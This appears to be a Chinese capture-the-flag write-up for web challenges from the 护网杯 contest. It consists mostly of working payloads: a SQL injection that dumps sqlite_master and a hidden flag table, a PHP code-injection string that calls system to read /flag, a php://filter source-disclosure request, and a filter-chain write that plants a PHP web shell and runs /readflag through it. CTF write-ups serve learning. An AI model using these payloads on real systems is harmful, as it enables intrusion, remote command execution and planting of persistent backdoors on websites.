护网杯.md

WEB

SQLManager

table_name=[aaa]as select [sql][&columns[0][name]=]from sqlite_master;&columns[0][type]=2

image-20201024111048154

得到数据库名和字段名

CREATE TABLE flag_Y0U_c4nt_GUESS (flag_ThE_C0lumn TEXT)

table_name=[aaa]as select [flag_ThE_C0lumn][&columns[0][name]=]from flag_Y0U_c4nt_GUESS;&columns[0][type]=TEXT

读取就完事了

image-20201024111344857

SimpleCalculator

search=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /flag

签到

拼图

easyphp

文件包含可以发现

index.php?page=php://filter/read=convert.base64-encode/resource=index.php

<?php
error_reporting(0);
$page = isset($_GET['page']) ? $_GET['page'] : 'main.html';
if (isset($_GET['page'])) {
    $page = $_GET['page'];
} else {
    header('location:index.php?page=main.html');
}
// You may want to see 7fa3b767c460b54a2be4d49030b349c7.php
?>

7fa3b767c460b54a2be4d49030b349c7.php

wmctf2020原题。

7fa3b767c460b54a2be4d49030b349c7.php?content=php://filter/write=string.strip_tags|zlib.inflate|%3F%3E%b3%b1%2f%c8%2
8%50%28%ae%2c%2e%49%cd%d5%50%89%77%77%0d%89%8e%8f%d5%b4%b6%b7%03%3C%3F/resourc
e=ha1c9on.php	
//?><? system($_GET[_]);

然后访问

http://url/sandbox/sandbox/ha1c9on.php?__=/readflag

发表评论

电子邮件地址不会被公开。 必填项已用*标注